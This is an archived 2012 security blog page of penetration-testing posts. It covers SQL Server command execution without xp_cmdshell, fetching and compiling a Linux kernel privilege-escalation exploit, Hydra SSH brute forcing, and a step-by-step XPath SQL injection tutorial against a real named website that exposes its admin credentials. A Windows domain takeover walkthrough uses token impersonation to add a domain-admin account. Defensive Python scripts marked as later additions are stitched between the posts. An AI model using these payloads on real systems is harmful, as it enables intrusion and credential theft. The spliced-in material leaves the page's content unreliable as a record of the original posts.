Archive

Archive for the 'Technical Articles' category

Running CMD commands on an injectable SQL Server without xp_cmdshell support

March 16, 2012 | 1 comment

The extended stored procedure xp_cmdshell can be used to run operating-system console commands. The method is very simple; it needs only the following SQL statement:

EXEC master.dbo.xp_cmdshell 'dir c:\'

But more and more database administrators have become aware of the potential danger of this extended stored procedure, and may have deleted or renamed its dynamic link library, xplog70.dll. At that point many people give up, since without it no cmd commands can be run, it becomes hard to view the target machine's files, directories and running services, and no NT users can be added.

After some research into this I found that even when xp_cmdshell is unavailable it is still possible to run CMD on the server and get the output back, using several other SQL Server system stored procedures: sp_OACreate, sp_OAGetProperty and sp_OAMethod. The prerequisite is that Wscript.Shell and Scripting.FileSystemObject are available on the server.
Read more...

Fixing the BackTrack 5 R2 Metasploit bug

March 8, 2012 | No comments

Metasploit fails to start on BackTrack 5 R2.

Fix:

cd /opt/metasploit/common/lib
mv libcrypto.so.0.9.8 libcrypto.so.0.9.8-b
mv libssl.so.0.9.8 libssl.so.0.9.8-backup
ln -s /usr/lib/libcrypto.so.0.9.8
ln -s /usr/lib/libssl.so.0.9.8
msfupdate

BackBox Linux 2.01

March 6, 2012 | 1 comment

BackBox is an Ubuntu-based distribution developed for network penetration testing and security assessment. It is designed to be fast and easy to use. It provides a minimal yet complete desktop environment, thanks to its own software repositories, which are always kept in sync with the latest versions of the most commonly used and best-known ethical hacking tools.

Read more...

Privilege escalation vulnerability in Linux 2.6.39 through 3.2.0

March 6, 2012 | No comments

1. Download the exploit file

wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c

2. Compile

gcc mempodipper.c -o mempodipper

3. Check before running

netcat@netcat:~$ uname -r
3.0.0-12-generic
netcat@netcat:~$ cat /etc/issue
Ubuntu 11.10 \n \l

netcat@netcat:~$ uname -a
Linux netcat 3.0.0-12-generic #20-Ubuntu SMP Fri Oct 7 14:50:42 UTC 2011 i686 i686 i386 GNU/Linux
netcat@netcat:~$ id
uid=1000(netcat) gid=1000(netcat) 组=1000(netcat),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),118(admin),124(sambashare)
Read more...
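A defender's counterpart to the "check before running" step above, added here as an example (not from the original post): parse the `uname -r` release string and test it against the version range named in the post's title. The sample release strings are constructed.

```python
"""Test a kernel release string against the version range in the post's title.

Added example, not from the original post. Distribution kernels carry suffixes
("3.0.0-12-generic", "2.6.32-220.el6.x86_64"), so the numeric prefix is parsed
and compared as a tuple; plain string comparison would sort "3.10" before "3.2".
A hit means "check the distribution's errata", not "vulnerable": distributions
backport fixes without changing the version number. Sample strings are constructed.
"""
import platform
import re

AFFECTED_LOW = (2, 6, 39)   # bounds as given in the post title, both inclusive
AFFECTED_HIGH = (3, 2, 0)


def parse_release(release):
    """'3.0.0-12-generic' -> (3, 0, 0); '3.2' -> (3, 2, 0)."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release.strip())
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    major, minor, patch = m.groups()
    return (int(major), int(minor), int(patch or 0))


def in_affected_range(release):
    """True when the numeric part of `release` lies within the post's range."""
    return AFFECTED_LOW <= parse_release(release) <= AFFECTED_HIGH


# Constructed sample releases: the post's Ubuntu 11.10 kernel, a CentOS 6 kernel,
# the BT5 R2 kernel named elsewhere on this page, and a later CentOS 7 kernel.
SAMPLES = ["3.0.0-12-generic", "2.6.32-220.el6.x86_64", "3.2.6", "3.10.0-123.el7.x86_64"]

if __name__ == "__main__":
    for r in SAMPLES + [platform.release()]:   # platform.release() is `uname -r` on Linux
        try:
            print(f"{r:28} in range: {in_affected_range(r)}")
        except ValueError as exc:
            print(exc)
```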

Upgrading BackTrack 5 R1 to BackTrack 5 R2

March 6, 2012 | No comments

The long-awaited release of the BackTrack 5 R2 kernel has arrived, and it's now available in our repositories. With a spanking brand new 3.2.6 kernel, a huge array of new and updated tools and security fixes, BT5 R2 will provide a more stable and complete penetration testing environment than ever before. We will start a series of blog posts on how to upgrade, deal with VMWare, and even build your own updated BT5 R2 by yourself. For now though, here's how to get the new kernel and all of the updated goodness:

1. Update and upgrade your BT5 (R1) installation:

apt-get update
apt-get dist-upgrade
apt-get install beef
reboot

Compiling and installing Nginx + PHP + MySQL on CentOS 6

February 17, 2012 | No comments

[1]. Install Nginx

1. Add a user that cannot log in and has no home directory:

# useradd www -M -s /sbin/nologin

2. Required components

# unzip pcre-8.13.zip
# cd pcre-8.13
# ./configure
# make && make install

3. Compile and install nginx

# tar -zxvf nginx-1.1.2.tar.gz
# cd nginx-1.1.2
# ./configure --prefix=/usr/local/nginx --user=www --group=www --with-http_stub_status_module --with-http_ssl_module
# make && make install

[2]. Install PHP

1. Install required components

# yum -y install libjpeg-devel libpng-devel
# tar -zxvf libmcrypt-2.5.7.tar.gz
# cd libmcrypt-2.5.7
# ./configure
# make && make install

== 64-bit systems ==

# ln -s /usr/lib64/mysql/ /usr/lib/mysql

== 64-bit systems ==

2. Compile and install PHP

# cd php-5.3.8
# ./configure --prefix=/usr/local/php --with-iconv --with-zlib --enable-xml --disable-rpath --enable-safe-mode --enable-bcmath --enable-shmop --enable-sysvsem --enable-inline-optimization --with-curl --with-curlwrappers --enable-mbregex --enable-mbstring --with-mcrypt --with-gd --enable-gd-native-ttf --with-openssl --with-mhash --enable-pcntl --enable-sockets --with-xmlrpc --enable-zip --enable-soap --without-pear --with-mysql --with-mysqli --enable-sqlite-utf8 --with-pdo-mysql --enable-ftp --with-jpeg-dir --with-freetype-dir --with-png-dir --enable-fpm --with-fpm-user=www --with-fpm-group=www
# make && make install

3. Copy and modify the PHP configuration files

# cp php.ini-production /usr/local/php/lib/php.ini    # or /usr/local/lib/php.ini
# cp /usr/local/php/etc/php-fpm.conf.default /usr/local/php/etc/php-fpm.conf
# /usr/local/php/bin/php --ini    # check whether the ini file is loaded

Edit php.ini

[PHP]
safe_mode = On
register_globals = Off
magic_quotes_gpc = Off
allow_url_fopen = Off
allow_url_include = Off
expose_php = Off
disable_functions = shell_exec,system,exec,passthru,show_source,curl_exec,curl_multi_exec,get_cfg_var
[Date]
date.timezone = "Asia/Shanghai"
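To make the hardening settings above checkable rather than just copied, here is an added example (not from the original post) that parses a php.ini and reports every directive that differs from the post's values, plus any function missing from disable_functions. safe_mode is left out of the check because it was deprecated in PHP 5.3 and removed in 5.4; the two ini samples in the block are constructed.

```python
"""Audit a php.ini against the hardening directives set in the post above.

Added example, not from the original post. Parses php.ini text (sections and
';' comments ignored) and reports every directive that differs from the post's
value, plus any function missing from disable_functions. The two ini samples
below are constructed.
"""
import sys

# Values the post sets. safe_mode is omitted: deprecated in PHP 5.3, removed in 5.4.
EXPECTED = {
    "register_globals": "Off",
    "magic_quotes_gpc": "Off",
    "allow_url_fopen": "Off",
    "allow_url_include": "Off",
    "expose_php": "Off",
}
EXPECTED_DISABLED = {"shell_exec", "system", "exec", "passthru", "show_source",
                     "curl_exec", "curl_multi_exec", "get_cfg_var"}


def parse_ini(text):
    """Return {directive: value}; keys lower-cased, surrounding quotes stripped."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()   # ';' starts a comment in php.ini
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip().lower()] = value.strip().strip('"\'')
    return settings


def norm_flag(value):
    """php.ini accepts On/1/True/Yes and Off/0/False/No; fold them to on/off."""
    v = value.strip().lower()
    if v in ("1", "on", "true", "yes"):
        return "on"
    if v in ("0", "off", "false", "no", "none", ""):
        return "off"
    return v


def audit(text):
    """Return [(directive, found, expected)] for every setting weaker than the post's."""
    found = parse_ini(text)
    problems = []
    for key, want in EXPECTED.items():
        have = found.get(key, "<unset>")
        if norm_flag(have) != norm_flag(want):
            problems.append((key, have, want))
    disabled = {f.strip() for f in found.get("disable_functions", "").split(",") if f.strip()}
    missing = sorted(EXPECTED_DISABLED - disabled)
    if missing:
        problems.append(("disable_functions", ",".join(sorted(disabled)) or "<unset>",
                         "add " + ",".join(missing)))
    return problems


# Constructed sample: a default-style php.ini that was never hardened.
WEAK_INI = """\
[PHP]
register_globals = Off
magic_quotes_gpc = On
allow_url_fopen = On
allow_url_include = Off
expose_php = On
disable_functions =
[Date]
date.timezone = "Asia/Shanghai"
"""

# Constructed sample: the post's php.ini block (safe_mode kept as the post has it).
HARDENED_INI = """\
[PHP]
safe_mode = On
register_globals = Off
magic_quotes_gpc = Off
allow_url_fopen = Off
allow_url_include = Off
expose_php = Off
disable_functions = shell_exec,system,exec,passthru,show_source,curl_exec,curl_multi_exec,get_cfg_var
[Date]
date.timezone = "Asia/Shanghai"
"""

if __name__ == "__main__":
    # Usage: python audit_php_ini.py /usr/local/php/lib/php.ini  (falls back to WEAK_INI)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else WEAK_INI
    for key, have, want in audit(text):
        print(f"{key}: found {have!r}, expected {want}")
```

Run it against the file that `php --ini` reports as loaded, since the post notes two candidate paths for php.ini and a directive edited in the wrong copy silently stays at its default.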

Edit php-fpm.conf

[global]
pid = run/php-fpm.pid
error_log = log/php-fpm.log
log_level = notice
emergency_restart_threshold = 0
emergency_restart_interval = 0
[www]
pm.start_servers = 20
pm.min_spare_servers = 5
pm.max_spare_servers = 35
pm.max_requests = 500

4. Add the service startup scripts

# cp nginx /etc/init.d/nginx
# cp php-fpm /etc/init.d/php-fpm
# chmod 755 /etc/init.d/nginx
# chmod 755 /etc/init.d/php-fpm
# chkconfig --add nginx
# chkconfig --add php-fpm
# chkconfig nginx on
# chkconfig php-fpm on

[3]. Install MySQL

3.1. Create the MySQL installation directory

# mkdir -p /usr/local/mysql/

3.2. Create the data directory

# mkdir -p /data/mysql/

3.3. Create the user and group and grant permissions on the data directory

# useradd mysql -M -s /sbin/nologin
# chown mysql.mysql -R /data/mysql/

3.4. Install required components

# yum -y install cmake
# yum -y install ncurses-devel

3.5. Compile and install MySQL

# cmake -DCMAKE_INSTALL_PREFIX=/usr/local/mysql -DMYSQL_UNIX_ADDR=/data/mysql/mysql.sock -DDEFAULT_CHARSET=utf8 -DDEFAULT_COLLATION=utf8_general_ci -DWITH_EXTRA_CHARSETS:STRING=utf8,gbk -DWITH_MYISAM_STORAGE_ENGINE=1 -DWITH_INNOBASE_STORAGE_ENGINE=1 -DWITH_MEMORY_STORAGE_ENGINE=1 -DWITH_READLINE=1 -DENABLED_LOCAL_INFILE=1 -DMYSQL_DATADIR=/data/mysql -DMYSQL_USER=mysql -DMYSQL_TCP_PORT=3306
# make && make install

3.6. Initialize the database

# cd /usr/local/mysql
# scripts/mysql_install_db --user=mysql --basedir=/usr/local/mysql --datadir=/data/mysql/

3.7. Configure the environment

# cp support-files/my-medium.cnf /etc/my.cnf
# cp support-files/mysql.server /etc/init.d/mysql
# chmod 755 /etc/init.d/mysql
# chkconfig mysql on
# export PATH=/usr/local/mysql/bin:$PATH

3.8. Start and set the initial password

# /etc/init.d/mysql start
# mysqladmin -uroot password '123123'

Statements for changing the password again later:
1: UPDATE mysql.user SET Password = PASSWORD('newpwd') WHERE User = 'root'; (reset the password)
2: flush privileges; (reload the privileges)

BT5 R1: boot straight into the graphical interface

February 17, 2012 | No comments

Method 1: log straight into root's graphical session without entering a password

1. Install rungetty

# apt-get install rungetty

2. Edit /etc/init/tty1.conf

# gedit /etc/init/tty1.conf

Comment out the exec line and add one line:

#exec /sbin/getty 38400 tty1
exec /sbin/rungetty tty1 --autologin root

3. Edit .bash_profile; create it if it does not exist

# gedit /root/.bash_profile

Contents:

startx

Method 2: boot straight into the graphical interface and prompt for the user's password

1. Install gdm

# sudo apt-get install gdm

2. Set gdm as the default

# sudo update-rc.d gdm defaults

3. Edit grub

# vim /etc/default/grub

GRUB_CMDLINE_LINUX_DEFAULT="text splash vga=791"
Change text to quiet:
GRUB_CMDLINE_LINUX_DEFAULT="quiet splash vga=791"

4. Update grub

# sudo update-grub

5. Reboot

# init 6

VPN dialing on BT5 R1: installing NetworkManager

February 17, 2012 | No comments

1. VPN dial-up:

# apt-get install network-manager-gnome
# apt-get install network-manager-pptp
# apt-get install network-manager-vpnc
# cp /etc/network/interfaces /etc/network/interfaces.backup
# echo "auto lo" > /etc/network/interfaces
# echo "iface lo inet loopback" >> /etc/network/interfaces
# service network-manager restart

After installing and restarting network-manager, a network icon appears at the top right of the GNOME menu; click it and add the VPN.

2. The Wicd Network Manager wireless connection interface reports an error:
Could not connect to wicd's D-Bus interface. Check the wicd log for error messages.
Fix:

# dpkg-reconfigure wicd
# update-rc.d wicd defaults

Brute-forcing SSH with Hydra

February 15, 2012 | No comments

apt-get purge hydra
apt-get install cmake libssl-dev

cd /usr/local/src
wget http://www.libssh.org/files/0.4/libssh-0.4.8.tar.gz
tar zxf libssh-0.4.8.tar.gz
cd libssh-0.4.8
mkdir build
cd build
cmake -DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_BUILD_TYPE=Debug -DWITH_SSH1=ON ..
make
make install

cd /usr/local/src
wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz
tar zxf hydra-6.3-src.tar.gz
cd hydra-6.3-src
./configure
make
make install

 

Finally, a screenshot of the result:

Although it did not manage to crack the password, you can see that the brute-force speed is quite good.
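Seen from the server being tested, the guessing rate the post praises is also the signal: every guess sshd rejects writes one "Failed password" line to the auth log. The added example below (not from the original post) counts failures per source address over a sliding window and reports sources that exceed a threshold, together with the usernames they tried. The log lines are constructed.

```python
"""Flag SSH password guessing from sshd auth-log lines.

Added example, not from the original post. Each rejected guess is one
"Failed password" line; a per-source counter over a sliding window exposes a
run like the one in the post long before a weak password falls. The sample log
lines are constructed; syslog stamps carry no year, so one is supplied.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2")


def parse_ts(stamp, year=2012):
    """'Feb 15 21:10:05' -> datetime; the year is an assumption (constructed: 2012)."""
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(lines, threshold=5, window_seconds=60):
    """Return {ip: (failures_in_window, sorted usernames tried)} for sources that
    reach `threshold` failed logins within `window_seconds`."""
    recent = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    users = defaultdict(set)      # ip -> every username that source tried
    alerts = {}
    for line in lines:
        m = FAILED_RE.match(line)
        if not m:
            continue                # accepted logins and unrelated lines are ignored
        ip, ts = m.group("ip"), parse_ts(m.group("ts"))
        q = recent[ip]
        q.append(ts)
        users[ip].add(m.group("user"))
        while q and (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()             # drop failures that fell out of the window
        if len(q) >= threshold:
            alerts[ip] = (len(q), sorted(users[ip]))
    return alerts


# Constructed sample: one legitimate login, a burst of guesses from one source,
# and a single mistyped password from the legitimate user.
SAMPLE_AUTH_LOG = [
    "Feb 15 21:10:01 bt sshd[2201]: Accepted password for netcat from 192.0.2.20 port 50110 ssh2",
    "Feb 15 21:10:05 bt sshd[2210]: Failed password for root from 203.0.113.8 port 41001 ssh2",
    "Feb 15 21:10:06 bt sshd[2212]: Failed password for root from 203.0.113.8 port 41002 ssh2",
    "Feb 15 21:10:06 bt sshd[2214]: Failed password for invalid user admin from 203.0.113.8 port 41003 ssh2",
    "Feb 15 21:10:07 bt sshd[2216]: Failed password for root from 203.0.113.8 port 41004 ssh2",
    "Feb 15 21:10:08 bt sshd[2218]: Failed password for invalid user test from 203.0.113.8 port 41005 ssh2",
    "Feb 15 21:10:09 bt sshd[2220]: Failed password for root from 203.0.113.8 port 41006 ssh2",
    "Feb 15 21:12:30 bt sshd[2250]: Failed password for netcat from 192.0.2.20 port 50111 ssh2",
]

if __name__ == "__main__":
    for ip, (count, tried) in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(f"{ip}: {count} failures in window, usernames tried: {', '.join(tried)}")
```

The same counter is what fail2ban-style tooling implements; the threshold and window here are deliberately low so the constructed burst trips it, and a real deployment tunes both against its own baseline of mistyped passwords.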

Xpath SQL Injection

February 10, 2012 | No comments

So a few XPath Injection tutorials have been getting posted, and since I haven't seen much info on the updatexml method, I thought I'd make a quick tutorial for it. Now I'll be going over both methods just for the sake of adding it to my mega-thread.

Extract Value

I'll be using this site as an example.

Code:
http://leadacidbatteryinfo.org/newsdetail.php?id=51

Version (ExtractValue)

Code:
+and+extractvalue(rand(),concat(0x7e,version()))--

This will return our XPATH Syntax error, and give us our version.
This is what my link looks like.
Code:http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,version()))--

Code:
XPATH syntax error: '~5.1.52-log'

You should get your version.

Getting The Tables (Extract Value)

 

Code:
+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))--
My link looks like this.
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))--

So let's load it up and see if we get our first table name!

Code:

XPATH syntax error: '~pdigclicks'
Woot it worked! Now we just increment in our limit statement until we find our table we want columns from.

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+1,1)))--

Code:

XPATH syntax error: '~pdigengine'

(#‵′)凸
We want users or admin..
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+2,1)))--

Code:

XPATH syntax error: '~pdigexcludes'

 

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+10,1)))--
Code:
XPATH syntax error: '~tbladmin'

Woot, now let's get the columns.

 

Getting The Columns (ExtractValue)
First off, we want to convert our table name to hex.
My table name was tbladmin.
Whenever you convert something to hex, you add 0x in front of it.
It tells the site to read the hex value.
The hex of tbladmin is 74626c61646d696e
So it should look like this.
Code:0x74626c61646d696e
Now to get our columns, we change our syntax a bit, but it's still generally the same idea.
Code:
+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=0xTABLE_HEX+limit+0,1)))--
Of course, replace TABLE_HEX with the hex value of your table name.
My link looks like this.
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=0x74626c61646d696e+limit+0,1)))--

Code:
XPATH syntax error: '~adminid'

Now use increment in your limit statement until you find the columns you want.

 

Getting Data Out of Columns (ExtractValue)

Now that you've got your column names, you're going to want to put them in a concat statement.

Code:
+and+extractvalue(rand(),concat(0x7e,(select+concat(column1,0x7e,column2)+from+TABLENAME+limit+0,1)))--
The columns I wanted were username and password; 0x7e is the hex value of "~", which I'll use as a separator.
My link looks like this.
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=51+and+extractvalue(rand(),concat(0x7e,(select+concat(username,0x7e,password)+from+tbladmin+limit+0,1)))--
And as you can see, we get our XPath error with the admin login.

Code:XPATH syntax error: '~ishir~ishir123'

UpdateXML

 

Getting The Version (UpdateXML)

Code:+and+updatexml(0x7e,concat(0x7e,(version())),0)--

My link looks like this..

Code:leadacidbatteryinfo.org/newsdetail.php?id=52+and+updatexml(0x7e,concat(0x7e,(version())),0)--

We get our XPATH Error that returns the version.
Code:

XPATH syntax error: '~5.1.52-log'

Getting The Tables (UpdateXML)

Code:
+and+updatexml(0x7e,concat(0x7e,((select+concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1))),0)--

My link looks like this..

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+updatexml(0x7e,concat(0x7e,((select+concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+0,1))),0)--


Code:

XPATH syntax error: '~pdigclicks'

Now we know our first table is called pdigclicks. Let's see what else is in here....
Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+updatexml(0x7e,concat(0x7e,((select+concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+1,1))),0)--

Code:
XPATH syntax error: '~pdigengine'

For the sake of time, I know the table name I want is tbladmin.
Code:
leadacidbatteryinfo.org/newsdetail.php?id=52+and+updatexml(0x7e,concat(0x7e,((select+concat(table_name)+from+information_schema.tables+where+table_schema=database()+limit+10,1))),0)--
And there's our table.
Code:

XPATH syntax error: '~tbladmin'

Now let's get the columns from the table.

Getting Columns (UpdateXML)

Now it's the same idea, we just change the tables to columns, from the table name.

Code:
+and+updatexml(0x7e,concat(0x7e,((select+concat(column_name)+from+information_schema.columns+where+table_name=0xTABLE_HEX+limit+0,1))),0)--

Now my table name was tbladmin, so I convert that to hex and get 74626c61646d696e

My link looks like this.

Code:
http://www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+updatexml(0x7e,concat(0x7e,((select+concat(column_name)+from+information_schema.columns+where+table_name=0x74626c61646d696e+limit+0,1))),0)--

 

Code:
XPATH syntax error: '~adminid'


Getting Data (UpdateXML)

Now once you've got your columns, concatenate them and get them from the table you want.
Code:

leadacidbatteryinfo.org/newsdetail.php?id=52+and+updatexml(0x7e,concat(0x7e,((select+concat(column1,0x7e,column2)+from+TABLENAME+limit+0,1))),0)--

My link looks like this..
Code:

http://www.leadacidbatteryinfo.org/newsdetail.php?id=52+and+updatexml(0x7e,concat(0x7e,((select+concat(username,0x7e,password)+from+tbladmin+limit+0,1))),0)--
Code:
XPATH syntax error: '~ishir~ishir123'


Exporting IIS configuration from the command line

January 31, 2012 | No comments

While penetrating an internal network I obtained an internal SA; the externally mapped IP was unknown, port 80 was open, the server could not connect outward, and I badly wanted this machine's IIS configuration. I googled it, found the method, and am sharing it here.

iiscnfg /export /f c:\chinadu.xml /sp / /children /inherited

But in many cases, if you run this directly on the server it errors out because cscript is not the default VBS interpreter (iiscnfg is a VBS file, iiscnfg.vbs), so we should run it through cscript with arguments:

cscript C:\WINDOWS\system32\iiscnfg.vbs /export /f c:\chinadu.xml /sp / /children /inherited

PS: at first the path after the /sp parameter kept being wrong; later I found that using the root path "/" works, and the information is more complete.
Google for the detailed parameters.

PS:
The [tag name missing from the archived page] tag holds the site's basic configuration information
The [tag name missing from the archived page] tag holds the site's directory configuration and other configuration information
Look through the rest yourself

How to attack a windows domain

January 2, 2012 | No comments

Get administrator rights on a workstation which is on a Windows domain using whatever method you can find (exploit, stolen password, smbrelay, phishing, etc.). Look for the domain server. There are a variety of ways to do this. You can arp -a to find active IPs or ping-scan the network and then use the nbtstat tool to look for the right domain controller identifier or an obvious hostname.

You can also browse the network neighborhood or use the net view command.

Acquiring and cracking the hashes of your target is generally useful as well.

Enumerate group membership so you know who to target.

Get the usernames in the local administrators group:

C:\WINDOWS\system32>net localgroup administrators
net localgroup administrators
Alias name  administrators
Comment     Administrators have complete and unrestricted access to the computer/domain

Members
--------------------------------------
Administrator
BLACKHAT\Domain Admins
hacked
local_valsmith
root
The command completed successfully.

Enumerate the domain admins

C:\WINDOWS\system32>net group "domain admins" /domain
net group "domain admins" /domain
The request will be processed at a domain controller for domain blackhat.com.

Group name   Domain Admins
Comment      Designated administrators of the domain

Members

---------------------------------------------------
admin_valsmith      Administrator
The command completed successfully.

So admin_valsmith is our target domain admin. Let's say the workstation we hacked is on 172.16.1.10. We now need to find out if there are any security tokens we can access.

c:\incognito>incognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 list_tokens -u
[*] Attempting to establish new connection to \\172.16.1.10\IPC$
[*] Logon to \\172.16.1.10\IPC$ succeeded
[*] Copying service to \\172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-FC12020A7EED}
[*] Redirecting I/O to remote process

[*] Enumerating tokens
[*] Listing unique users found...

Delegation Tokens Available
==========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
XPCLIENT\local_valsmith

Impersonation Tokens Available
==========================================
BLACKHAT\admin_valsmith
NT AUTHORITY\ANONYMOUS LOGON

[*] Service shutdown detected. Service executable file deleted
[*] Deleting service

So admin_valsmith is our target domain administrator and an impersonation token is available to us!

The above command assumes we have cracked the hash of the local admin and retrieved the password. This will connect to IPC$ share on the target and list any tokens that are available.

Next we will utilize this token to gain domain admin rights:

C:\incognito>incognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 execute -c "blackhat\admin_valsmith" cmd

[*] Attempting to establish new connection to \\172.16.1.10\IPC$
[+] Logon to \\172.16.1.10\IPC$ succeeded
[*] Copying service to \\172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-9047A294CE6D}
[*] Redirecting I/O to remote process

[*] Enumerating tokens
[*] Searching for availability of requested token
[+] Requested token found
[-] No Delegation token available
[*] Attempting to create new child process and communicate via anonymous pipe
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
admin_valsmith

So we now have a shell with the rights of the domain administrator. We will add an account to the domain controller to demonstrate our access:

C:\>net user hacked 0h3ck3d! /add /domain
net user hacked 0h3cked! /add /domain
The request will be processed at a domain controller for domain blackhat.com.

The command completed successfully.

Now we want to add our account to the domain admin group. NOTE: often you don’t want to add an account, especially one named hacked as it is likely to be discovered by the admins.

C:\>net group "domain admins" hacked /add /domain
net group "domain admins" hacked /add /domain
The reuqest will be processed at a domain controller for domain blackhat.com

The command completed successfully.

At this point we have control over the domain and can likely log into any workstation which is on the domain.
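The two net commands at the end of the walkthrough leave a clear trail on the domain controller: event 4720 (a user account was created) followed by 4728 (a member was added to a security-enabled global group, which is what Domain Admins is; 4732 is the local-group counterpart for groups such as Administrators). The added example below (not from the original post) correlates the two and flags a privileged-group addition whose target account was created only minutes earlier. The events are constructed dicts using the names from the walkthrough; mapping real Security-log records to these fields is left to whatever collector is in use.

```python
"""Correlate account-creation and privileged-group-addition events.

Added example, not from the original post. Consumes simplified event dicts
(event_id, time, target, subject, group) rather than raw Security-log XML; the
sample events below are constructed around the walkthrough's account names.
"""
from datetime import datetime, timedelta

# Groups whose membership changes are worth an alert on their own.
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Schema Admins", "Administrators"}
# 4728: member added to a security-enabled global group (Domain Admins is global);
# 4732: member added to a security-enabled local group (Administrators is domain local).
GROUP_ADD_EVENTS = {4728, 4732}
ACCOUNT_CREATED = 4720


def correlate(events, max_gap=timedelta(minutes=30)):
    """Return one alert dict per privileged-group addition, marking whether the
    added account was created (event 4720) within max_gap before it."""
    created = {}           # account name (lower-cased) -> (creation time, creator)
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        target = ev["target"].lower()
        if ev["event_id"] == ACCOUNT_CREATED:
            created[target] = (ev["time"], ev["subject"])
        elif ev["event_id"] in GROUP_ADD_EVENTS and ev.get("group") in PRIVILEGED_GROUPS:
            alert = {"account": ev["target"], "group": ev["group"],
                     "added_by": ev["subject"], "new_account": False}
            if target in created and ev["time"] - created[target][0] <= max_gap:
                alert["new_account"] = True          # created-then-promoted pattern
                alert["created_by"] = created[target][1]
            alerts.append(alert)
    return alerts


BASE = datetime(2012, 1, 2, 9, 0, 0)   # constructed reference time


def _t(minutes):
    return BASE + timedelta(minutes=minutes)


# Constructed sample: the walkthrough's 'hacked' account created and promoted a
# minute later, a routine account added to an ordinary group, and an existing user
# promoted to Domain Admins with no creation event in the window.
SAMPLE_EVENTS = [
    {"event_id": 4720, "time": _t(0), "target": "hacked", "subject": "BLACKHAT\\admin_valsmith"},
    {"event_id": 4728, "time": _t(1), "target": "hacked", "subject": "BLACKHAT\\admin_valsmith",
     "group": "Domain Admins"},
    {"event_id": 4720, "time": _t(5), "target": "svc_backup", "subject": "BLACKHAT\\Administrator"},
    {"event_id": 4728, "time": _t(6), "target": "svc_backup", "subject": "BLACKHAT\\Administrator",
     "group": "Sales"},
    {"event_id": 4728, "time": _t(40), "target": "jsmith", "subject": "BLACKHAT\\Administrator",
     "group": "Domain Admins"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Every Domain Admins addition is reported regardless, because the walkthrough's own note applies: an attacker holding an impersonation token does not need a new account and may promote an existing one instead, so the new_account flag only raises the priority of an alert that should already exist.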

Some further related reading:

One token to Rule them All: Post-Exploitation Fun in Windows Environments

Security implications of windows access tokens

Meta-Post_Exploitation.pdf
